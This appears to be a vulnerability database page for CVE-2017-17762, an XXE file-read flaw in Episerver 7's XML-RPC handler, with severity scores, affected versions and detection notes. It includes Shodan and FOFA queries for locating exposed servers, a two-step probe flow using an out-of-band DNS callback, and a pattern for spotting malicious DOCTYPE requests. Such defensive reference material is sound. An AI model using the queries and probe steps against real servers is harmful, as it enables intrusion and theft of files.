cbcvebase.
CVE-2017-17762
published 2018-08-29

CVE-2017-17762: XML external entity (XXE) vulnerability in Episerver 7 patch 4 and earlier allows remote attackers to read arbitrary files via a crafted DTD in an XML request…

PriorityP277high7.5CVSS 3.0
AVNACLPRNUINSUCHINAN
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
4.65%
90.6th percentile
XML external entity (XXE) vulnerability in Episerver 7 patch 4 and earlier allows remote attackers to read arbitrary files via a crafted DTD in an XML request involving util/xmlrpc/Handler.ashx.

Affected

2 ranges
VendorProductVersion rangeFixed in
episerverepiserver<= 7
episerverepiserver

Detection & IOCsextracted from sources · hover to see the quote

url/util/xmlrpc/Handler.ashx
path/util/xmlrpc/Handler.ashx
commandPOST /util/xmlrpc/Handler.ashx HTTP/1.1 Content-Type: text/xml Accept: */*
sigma
shodan-query: http.html:"episerver" OR http.html:"epihash"
  • Probe for CVE-2017-17762 by first issuing a GET to /util/xmlrpc/Handler.ashx and confirming the response body contains 'EPiServer' with HTTP 200, then sending a malicious XML POST with an out-of-band XXE payload to the same endpoint.
  • Exploitation confirmation: a successful out-of-band XXE is indicated by an inbound DNS interaction (interactsh/OOB callback) combined with an HTTP 200 or 500 response from the target endpoint.
  • Hunt for exposed Episerver instances using Shodan queries for 'http.html:episerver', 'http.html:epihash', or the CPE string 'cpe:2.3:a:episerver:episerver', and FOFA queries for 'body=episerver' or 'body=epihash'.
  • The attack vector is a crafted DTD embedded in an XML POST body sent to /util/xmlrpc/Handler.ashx; monitor for XML POST requests to this path containing DOCTYPE declarations with SYSTEM or ENTITY keywords as an indicator of XXE exploitation attempts.
  • ·The Nuclei template uses an out-of-band (OOB/interactsh) DNS callback to confirm blind XXE; a DNS interaction alone is the confirmation signal — no direct file content is returned in-band.
  • ·The exploit flow is two-step: step 1 fingerprints the host (GET + body check for 'EPiServer'), and step 2 fires the XXE payload only if step 1 succeeds. Both conditions must be met for a true positive.
  • ·An HTTP 500 response on the POST is treated as a valid exploitation indicator alongside HTTP 200, so error responses should not be dismissed during detection.

CVSS provenance

nvdv3.07.5HIGHCVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
nvdv2.05.0MEDIUMAV:N/AC:L/Au:N/C:P/I:N/A:N
vulncheck7.5HIGH
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.